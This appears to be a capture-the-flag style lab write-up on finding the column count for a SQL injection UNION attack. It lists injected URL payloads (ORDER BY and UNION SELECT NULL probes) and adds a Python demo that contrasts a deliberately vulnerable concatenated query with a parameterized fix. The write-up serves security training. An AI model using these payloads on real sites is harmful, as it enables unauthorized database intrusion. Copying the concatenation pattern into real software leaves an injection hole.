Home πŸ•ΈοΈ PSA - SQLi 3 - UNION attack, determining the number of columns returned by the query
Post
Cancel

πŸ•ΈοΈ PSA - SQLi 3 - UNION attack, determining the number of columns returned by the query

Difficulty: Practitioner

🎯 Goal

To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.

✅ Solution

Initial request:

<website>/products?category=Gifts

We can now use two techniques to determine the number of columns returned:

Method 1 - ORDER BY

<website>/filter?category=Gifts' ORDER BY 1--    # works
<website>/filter?category=Gifts' ORDER BY 2--    # works
<website>/filter?category=Gifts' ORDER BY 3--    # works
<website>/filter?category=Gifts' ORDER BY 4--    # error!

So we know 3 columns are returned.

Method 2 - UNION SELECT NULL

<website>/filter?category=Gifts' UNION SELECT NULL--    # works
<website>/filter?category=Gifts' UNION SELECT NULL,NULL--    # works
<website>/filter?category=Gifts' UNION SELECT NULL,NULL,NULL--    # works
<website>/filter?category=Gifts' UNION SELECT NULL,NULL,NULL,NULL--    # error!

Same result: 3 columns are returned.
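
Why these probes get an answer from the application, and what the fix looks like, as an added example that is not part of the original post: inputs taken from the page are run against a constructed in-memory SQLite table, first through a query built by string concatenation and then through a parameterized one. The database engine, schema, rows and function names are all assumptions.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the lab's catalogue; schema and rows are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL, "
               "category TEXT, released INTEGER)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?, ?, ?)", [
        (1, "Gift card", 10.0, "Gifts", 1),
        (2, "Snow globe", 15.5, "Gifts", 1),
        (3, "Mystery box", 99.0, "Gifts", 0),   # unreleased, normally filtered out
        (4, "Dog bed", 30.0, "Pets", 1),
    ])
    return db

def search_vulnerable(db, category):
    # Deliberately vulnerable: the parameter becomes part of the SQL text, so a
    # quote ends the string literal and "--" comments out the rest of the query.
    sql = ("SELECT id, name, price FROM products WHERE category = '"
           + category + "' AND released = 1")
    return db.execute(sql).fetchall()

def search_parameterized(db, category):
    # Hardened: the value is bound as data and is never parsed as SQL.
    sql = "SELECT id, name, price FROM products WHERE category = ? AND released = 1"
    return db.execute(sql, (category,)).fetchall()

# Category values taken from the page's requests (a subset).
PAGE_INPUTS = [
    "Gifts",
    "Gifts' ORDER BY 3--",
    "Gifts' ORDER BY 4--",
    "Gifts' UNION SELECT NULL,NULL,NULL--",
    "Gifts' UNION SELECT NULL,NULL,NULL,NULL--",
]

def outcomes(search):
    """Map each input to the number of rows returned, or 'error'."""
    db, result = make_db(), {}
    for value in PAGE_INPUTS:
        try:
            result[value] = len(search(db, value))
        except sqlite3.Error:
            result[value] = "error"
    return result

if __name__ == "__main__":
    for name, fn in (("vulnerable", search_vulnerable),
                     ("parameterized", search_parameterized)):
        print(name, outcomes(fn))
```

On the concatenated query the errors appear where the page reports them (ORDER BY 4 and four NULLs); with the bound parameter every probe is just a category name that matches nothing, so it returns zero rows and no error.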

This post is licensed under GNU GPLv3 by the author.